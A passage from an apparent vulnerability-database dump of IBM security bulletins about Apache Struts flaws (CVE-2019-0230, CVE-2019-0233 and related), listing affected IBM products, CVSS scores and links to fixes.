IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for IBM Connections| 4.0.1.10| Use Content Collector for IBM Connections 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-04T09:04:41", "type": "ibm", "title": "Security Bulletin: Apache Struts (Publicly disclosed vulnerability) affects Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2020-11-04T09:04:41", "id": "3477DD0939B4B8CC59240F8DCC09305A2F7C13CA45285602F1755CDF6F593B52", "href": "https://www.ibm.com/support/pages/node/6359443", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-27T21:50:43", "description": "## Summary\n\nFix is available for vulnerabilities in Apache Struts affecting Tivoli Netcool/OMNIbus WebGUI (CVE-2019-0233, CVE-2019-0230).\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Tivoli Netcool/OMNIbus_GUI| 8.1.x \n \n\n\n## Remediation/Fixes\n\nProduct| VRMF| APAR | Remediation/First Fix \n---|---|---|--- \nTivoli Netcool/OMNIbus WebGUI| 8.1.0| IJ27034| Apply Fix Pack 20 \n([Fix Pack for WebGUI 8.1.0 Fix Pack 20](<https://www.ibm.com/support/pages/node/6236916> \"Fix Pack for WebGUI 8.1.0 Fix Pack 20\" )) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-09-23T04:29:58", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in Apache Struts affect Tivoli Netcool/OMNIbus WebGUI (CVE-2019-0233, CVE-2019-0230)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2020-09-23T04:29:58", "id": "9235ED396A90BB944C2B22072DE6B91B22155C3982DDD732067344CA700C0ADE", "href": "https://www.ibm.com/support/pages/node/6336355", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-27T21:49:24", "description": "## Summary\n\nApache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nContent Collector for Email| 4.0.1.10 \nContent Collector for Microsoft SharePoint| 4.0.1.10 \nContent Collector for File Systems| 4.0.1.10 \nContent Collector for IBM Connections| 4.0.1.10 \n \n \n\n\n## Remediation/Fixes\n\n**Product** | **VRM**| **Remediation** \n---|---|--- \nContent Collector for Email| 4.0.1.10| Use Content Collector for Email 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for File Systems| 4.0.1.10| Use Content Collector for File Systems 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for Microsoft SharePoint| 4.0.1.10| Use Content Collector for Microsoft SharePoint 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for IBM Connections| 4.0.1.10| Use Content Collector for IBM Connections 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-28T19:21:52", "type": "ibm", "title": "Security Bulletin: Apache Struts (Publicly disclosed vulnerability) affects Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2020-10-28T19:21:52", "id": "20DAAA2A40C4A633F7230B8255F0CADBA6E88A77DD305EC21132BECBFF011089", "href": "https://www.ibm.com/support/pages/node/6356621", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-27T21:49:12", "description": "## Summary\n\nApache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nContent Collector for Email| 4.0.1.10 \nContent Collector for Microsoft SharePoint| 4.0.1.10 \nContent Collector for File Systems| 4.0.1.10 \nContent Collector for IBM Connections| 4.0.1.10 \n \n \n\n\n## Remediation/Fixes\n\n**Product** | **VRM**| **Remediation** \n---|---|--- \nContent Collector for Email| 4.0.1.10| Use Content Collector for Email 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for File Systems| 4.0.1.10| Use Content Collector for File Systems 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for Microsoft SharePoint| 4.0.1.10| Use Content Collector for Microsoft SharePoint 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for IBM Connections| 4.0.1.10| Use Content Collector for IBM Connections 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-04T09:07:08", "type": "ibm", "title": "Security Bulletin: Apache Struts (Publicly disclosed vulnerability) affects Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2020-11-04T09:07:08", "id": "60BC7D4DCC3D358CA3A091D2D1C15EE5A67539C2664E72739BD35D6406A88E4A", "href": "https://www.ibm.com/support/pages/node/6359445", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-07T18:56:43", "description": "## Summary\n\nIBM Sterling File Gateway has addressed multiple security vulnerabilities in Apache Struts\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Sterling File Gateway| 2.2.0.0 - 6.0.3.2 \n \n## Remediation/Fixes\n\n** Product & Version**| **APAR**| ** Remediation & Fix** \n---|---|--- \n2.2.0.0 - 2.2.6.5_2| IT34076| Apply IBM Sterling B2B Integrator version 5.2.6.5_3, 6.0.3.3 or 6.1.0.0 on [Fix Central](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Other%2Bsoftware&product=ibm/Other+software/Sterling+B2B+Integrator&release=All&platform=All&function=all>) \n6.0.0.0 - 6.0.3.2| IT34076| Apply IBM Sterling B2B Integrator version 6.0.3.3 or 6.1.0.0 on [Fix Central](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Other%2Bsoftware&product=ibm/Other+software/Sterling+B2B+Integrator&release=All&platform=All&function=all>) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-22T15:14:01", "type": "ibm", "title": "Security Bulletin: Multiple Security Vulnerabilities in Apache Struts Affect IBM Sterling File Gateway (CVE-2019-0233, CVE-2019-0230)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2022-07-22T15:14:01", "id": "C6AE70E5471CDF678253E267AB7C45FA772A777F24502EE50E243BD88E300D13", "href": "https://www.ibm.com/support/pages/node/6324787", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-07T19:06:03", "description": "## Summary\n\nIBM Sterling Order Management Apache Struts vulnerablity\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Sterling Order Management| 10.0 \n \n\n\n## Remediation/Fixes\n\nOrder Management on premise release notes - <https://www.ibm.com/docs/en/order-management-sw/10.0?topic=software-fixes-by-fix-pack-version>\n\nFix Central Link (**FP details URL)**: \n[http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FSterling+Selling+and+Fulfillment+Foundation&fixids=10.0.0.0-Sterling-SSFF-All-fp29-Installer&source=SAR](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FSterling+Selling+and+Fulfillment+Foundation&fixids=10.0.0.0-Sterling-SSFF-All-fp29-Installer&source=SAR>)\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-11T01:06:34", "type": "ibm", "title": "Security Bulletin: IBM Sterling Order Management Apache Struts vulnerablity", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2022-05-11T01:06:34", "id": "C22DE952FD6E1544B14AE2735F81ACAE3EF08509FC895F0AAF0AC7485A98F798", "href": "https://www.ibm.com/support/pages/node/6565845", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-27T21:49:24", "description": "## Summary\n\nApache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nContent Collector for Email| 4.0.1.10 \nContent Collector for Microsoft SharePoint| 4.0.1.10 \nContent Collector for File Systems| 4.0.1.10 \nContent Collector for IBM Connections| 4.0.1.10 \n \n \n\n\n## Remediation/Fixes\n\n**Product** | **VRM**| **Remediation** \n---|---|--- \nContent Collector for Email| 4.0.1.10| Use Content Collector for Email 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for File Systems| 4.0.1.10| Use Content Collector for File Systems 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for Microsoft SharePoint| 4.0.1.10| Use Content Collector for Microsoft SharePoint 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for IBM Connections| 4.0.1.10| Use Content Collector for IBM Connections 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-28T19:08:30", "type": "ibm", "title": "Security Bulletin: Apache Struts (Publicly disclosed vulnerability) affects Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2020-10-28T19:08:30", "id": "461BBFF276D2BD07EE935B18691B56E01933360B1B42DAE8AAFFC1167BCA5486", "href": "https://www.ibm.com/support/pages/node/6356619", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-07T18:04:21", "description": "## Summary\n\nMultiple vulnerabilities in Apache Struts 2.3.x may affect IBM eDiscovery Manager. These are addressed.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2020-17530](<https://vulners.com/cve/CVE-2020-17530>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/192743](<https://exchange.xforce.ibmcloud.com/vulnerabilities/192743>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-31805](<https://vulners.com/cve/CVE-2021-31805>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a double evaluation of tag attributes. By forcing OGNL evaluation of specially-crafted data using the %{...} syntax, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223990](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223990>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \neDiscovery Manager| 2.2.2 \n \n## Remediation/Fixes\n\nProduct\n\n| VRM| Remediation \n---|---|--- \nIBM eDiscovery Manager| 2.2.2| \n\nUse IBM eDiscovery Manager 2.2.2.3 [Interim Fix 